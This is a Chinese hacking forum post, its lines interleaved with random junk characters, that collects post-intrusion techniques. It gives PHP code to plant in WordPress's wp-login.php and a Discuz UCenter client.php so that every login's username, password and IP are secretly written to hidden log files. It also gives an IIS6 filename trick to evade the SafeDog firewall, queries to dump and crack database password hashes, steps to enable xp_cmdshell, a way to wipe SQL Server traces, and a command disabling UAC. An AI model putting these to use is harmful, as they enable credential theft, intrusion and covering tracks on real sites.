( A8 f5 H6 v0 `2 \3 H, N8 {; @$txt=$txt.”\r\n”;
; R8 l/ V/ A( ^" f$ i6 B5 [if($log_user&&$log_pwd&&$log_ip){+ Z3 `* h7 a" V5 V( v: N# X
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);: M" u. S! s4 I6 I
}1 B/ Q! Y3 H( y# @
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。# U+ i: Q! u8 C+ j* t1 @$ |* }! }
就是搜索case ‘login’
& Q7 c( h& x- T' l! A在它下面直接插入即可,记录的密码生成在pwd.txt中,
: ]% v7 f  g6 ?; l. m其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
) \. M6 }/ V6 \0 z' e! G利用II6文件解析漏洞绕过安全狗代码:
* c, w0 M; Q) p( O& n;antian365.asp;antian365.jpg
, `  j0 F) i, O7 [/ N2 X+ ^
! a0 V5 d7 Q0 M* @; P: g% f8 m各种类型数据库抓HASH破解最高权限密码!. s/ S7 d8 o' I& p7 C1 @; _
1.sql server20006 O, D# `2 I/ r0 A
SELECT password from master.dbo.sysxlogins where name='sa'
* M; `3 i! d5 G# B0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341" c! X6 _4 f3 G: a* s- ~
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
6 J) f' b9 {3 J* k/ X/ @. m, o( U# U6 B) X- a3 d) z' o8 @
0×0100- constant header
0 d  o4 H: P. n1 U34767D5C- salt/ e, N- V. Z8 X6 |
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
1 r: d# z3 i5 U6 z7 B6 b2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash! h" Q7 n0 K# x/ D& M+ i1 b4 r
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
* @9 }8 s3 D& `; r4 `5 t" NSQL server 2005:-
* R5 z/ d# W; |" C0 w+ T5 F3 nSELECT password_hash FROM sys.sql_logins where name='sa'
9 Y) l* r+ f9 w+ ]0 S0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
6 @9 O5 C: G# {4 B4 j; s0×0100- constant header$ y3 ]5 I3 D% r" N
993BF231-salt0 D: y! f) F2 W# n9 Y( c( E
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash6 g0 O: `; }3 S9 G
crack case sensitive hash in cain, try brute force and dictionary based attacks.
$ K2 o6 P: ?7 X6 j' {+ |. z3 O( B& K0 t1 c
update:- following bernardo’s comments:-
5 e  e" h" \$ O% N$ s; wuse function fn_varbintohexstr() to cast password in a hex string.! v0 @' _7 [) ]& H$ [  N
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
1 u# g, x: u7 a( `  b9 O$ _2 e4 ]6 r4 K1 L9 E% d3 n/ K
MYSQL:-
( e3 i8 ?; F& h' U6 w6 x- o
6 n7 n' Q$ ], p/ z% |! GIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
3 W! Q3 m4 ?' P+ F
+ F* @' {! l+ C+ w* w- N*mysql  < 4.15 K3 h, G  s. V

# Q1 W$ z- R) C. fmysql> SELECT PASSWORD(‘mypass’);
6 S6 ^. o6 C  }7 H" @" x+——————–+
  W4 ~' _! _# |' g| PASSWORD(‘mypass’) |* }( ~. I1 M' j7 t
+——————–+
, h  o7 M0 V$ Q7 d) F4 a: a| 6f8c114b58f2ce9e   |
1 o; |6 m) p2 E3 o+——————–+
9 f8 _# T: y% X8 Z* `/ O2 _1 w
% E- X; S) ]7 L2 g2 E9 i*mysql >=4.1/ v" L! W" A6 L( i4 }  Y
7 I8 X$ `: u" g" c
mysql> SELECT PASSWORD(‘mypass’);
8 Q! C2 Y" d# s+——————————————-+6 t1 u) A( f& O) ~# q9 n+ O5 T
| PASSWORD(‘mypass’)                        |
: W3 v: ^  ^, S! z5 t9 F+——————————————-+
9 g' j8 n1 z( G* v5 x* ?' M0 E| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
$ q6 a8 B# w% Y( L$ [+ y( j+——————————————-+
6 i  i- R* \# m& j2 F, w3 A/ m& w& b# J
Select user, password from mysql.user& |1 r  Y# F- r9 j) H$ s& B6 y
The hashes can be cracked in ‘cain and abel’: o9 \, |2 }1 ]' h! l5 c
4 Q6 k: o% @# i. S
Postgres:-
# N/ a' N5 p5 ]Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)* M* q# G% i7 z5 L8 o! B4 p
select usename, passwd from pg_shadow;! R8 P% P( O9 V& f* n+ i! o) d
usename      |  passwd  o2 j% u$ g! \+ v
——————+————————————-3 Z: x; o, S& _5 k$ x" [, b
testuser            | md5fabb6d7172aadfda4753bf0507ed4396
! r7 J9 D- ^( v5 nuse mdcrack to crack these hashes:-: ~* m! C2 e& J$ l" f% A' q! q
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
: }8 f/ a3 P6 h* q2 w3 H' k# F: @& f' E$ J, c
Oracle:-
( T6 |- U2 t) @" J6 ^6 qselect name, password, spare4 from sys.user$
1 b; |2 O" N6 I$ ?7 `9 dhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g$ G8 [9 Z) }* a1 v: h7 }4 g, o; l
More on Oracle later, i am a bit bored….
1 P  W# V4 ~6 F7 @/ L6 _4 S) Q6 Z$ u1 j1 c/ ?, }7 a
* n) y- f" F  K" z5 @3 l  L8 ^
在sql server2005/2008中开启xp_cmdshell
! o/ S7 o7 `8 F8 E5 `0 v. ]-- To allow advanced options to be changed.
8 Y/ t" Q. p9 A4 B* H3 YEXEC sp_configure 'show advanced options', 16 Z3 l* x" ?- f5 D& |: ?$ U
GO* i2 ~; _/ Q1 o6 o
-- To update the currently configured value for advanced options.1 U& F- W4 V1 X3 ]& W
RECONFIGURE: L* f& t" u. c8 s( C  F( a3 i
GO7 y, ^) K1 s& F) X; n2 ]- Y
-- To enable the feature.- G9 k# J3 P0 E3 N- N
EXEC sp_configure 'xp_cmdshell', 1
6 y+ {" N6 n# B0 T" nGO/ E0 P5 n( j1 x- P3 s% s" w& g
-- To update the currently configured value for this feature.
# v  G( \; R. TRECONFIGURE/ C5 p/ C. l1 s! I+ Q, O
GO
% l% h0 g% V! _3 N5 G- N% ]9 I' ]SQL 2008 server日志清除,在清楚前一定要备份。
# }" y: v8 C  L  j# u如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:3 A! |; ~1 ~) v
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
$ ~! P! P* n1 h6 u, ], X- F6 k, u% q
对于SQL Server 2008以前的版本:. U. w* `% \- u1 q; N) `
SQL Server 2005:# M6 [4 t* q0 X, k4 i7 V2 q; e
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
4 }( H( X: M& l9 J' H: @0 LSQL Server 2000:) j& H; u- F7 x( L) a( ^; B
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。- x7 J1 }8 }/ Z, h/ B4 t
1 h+ p* K# x# J, w8 ^
本帖最后由 simeon 于 2013-1-3 09:51 编辑  x. m% F: z2 ]- @7 ~
/ @4 }# f; ^- {+ `9 u% R# m
/ m3 J2 j  X. `& }/ P
windows 2008 文件权限修改
2 |+ N- b) p* [7 ?1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx$ y) M, I- T5 b
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
1 g" T. G+ b8 u; X" o/ ~  ?一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
1 G9 _9 \. v& v* e: v! D1 e& o" E8 H
* a& H1 D) {- J; j! Y8 T4 n  cWindows Registry Editor Version 5.005 m# s% G  y( y0 I, W! R: {
[HKEY_CLASSES_ROOT\*\shell\runas]9 b( t, b9 h) b/ a6 T8 X( F& k, @
@="管理员取得所有权"
5 C' u: m) C+ `, B! a! J- I8 I. P- o"NoWorkingDirectory"="", l* I; Z# `5 V* ~
[HKEY_CLASSES_ROOT\*\shell\runas\command]% v. m5 G) j' J( @# m" e
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
2 K( A( ?2 b- a1 f. z7 Y/ y2 ^"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"6 p/ Z8 m) K$ b: [# ^  N! l; F5 `
[HKEY_CLASSES_ROOT\exefile\shell\runas2]$ r5 B9 H4 ^5 c2 [7 {
@="管理员取得所有权"
- K3 a% H0 Z6 h" T9 ]"NoWorkingDirectory"=""
) w# s& C. e% `( z4 C[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]: o& k- r7 C  G7 l- j
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 @7 G( {  Q# E4 x"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ P7 l- r! K! A/ R/ h( [

3 q9 w: M% C6 E& U[HKEY_CLASSES_ROOT\Directory\shell\runas]
4 y8 `6 v: |$ c- W% G@="管理员取得所有权"* e1 `2 Q% `: a5 T% H7 w& [7 [! F+ K
"NoWorkingDirectory"=""7 B1 x' }7 J# m+ B+ Z. K
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]8 g; O2 d/ {0 ^
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
2 z& E9 N& M+ ^, G0 V"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t": l3 t' j$ Z' Q
! _# x+ X, D' \& q# A
& ?% N. L4 x9 p
win7右键“管理员取得所有权”.reg导入
; E, h6 i' ^7 g& A4 O. n6 j4 Q二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
: {) n" h4 p" D3 N3 f# L1、C:\Windows这个路径的“notepad.exe”不需要替换
/ r" i$ ?* g+ X8 k2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
% p3 ?: f9 V2 q1 L) x5 D3、四个“notepad.exe.mui”不要管5 d! v7 R7 B- A2 |, V* p1 q% R! ?
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和$ L; s& k7 W4 f
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
# Q0 s6 V: S+ k- U2 b% J2 T; {  {替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
7 c- k8 a: x1 P8 R- D+ X7 d替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
3 c$ l8 ?6 g( r, }5 n% F9 mwindows 2008中关闭安全策略:
  X. H% G- K" r8 g' L" E: L; r4 S. T. C6 J4 ereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f% s& H8 Z/ E  @6 d, d1 K
修改uc_client目录下的client.php 在
6 e" `1 q& {' c1 ~function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {. ]' I  U2 c9 t% S4 J! `
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php/ |: C/ C. _9 ]/ a! v3 L
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) h: \' [; M* G
if(getenv('HTTP_CLIENT_IP')) {% J9 K- \  F7 T+ s% {) g
$onlineip = getenv('HTTP_CLIENT_IP');
/ ?4 k5 N# J/ _0 |" G} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
1 [! _7 V3 b5 q2 S$onlineip = getenv('HTTP_X_FORWARDED_FOR');
+ `3 }- g' k& X1 @9 E} elseif(getenv('REMOTE_ADDR')) {
/ @! E0 f5 U& q; m$onlineip = getenv('REMOTE_ADDR');
! s! Q4 _- O* `. U, j} else {, z$ e% x8 f1 M# z2 ]
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
/ Y. N- `9 `+ N3 I/ x! B/ q}
2 Y# [; V- I: c! p9 a7 {6 \  w( B     $showtime=date("Y-m-d H:i:s");* v5 \9 e, N) B; |/ m. P
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
+ R. R  _! c; W    $handle=fopen('./data/cache/csslog.php','a+');
1 F- q2 _  W6 _    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表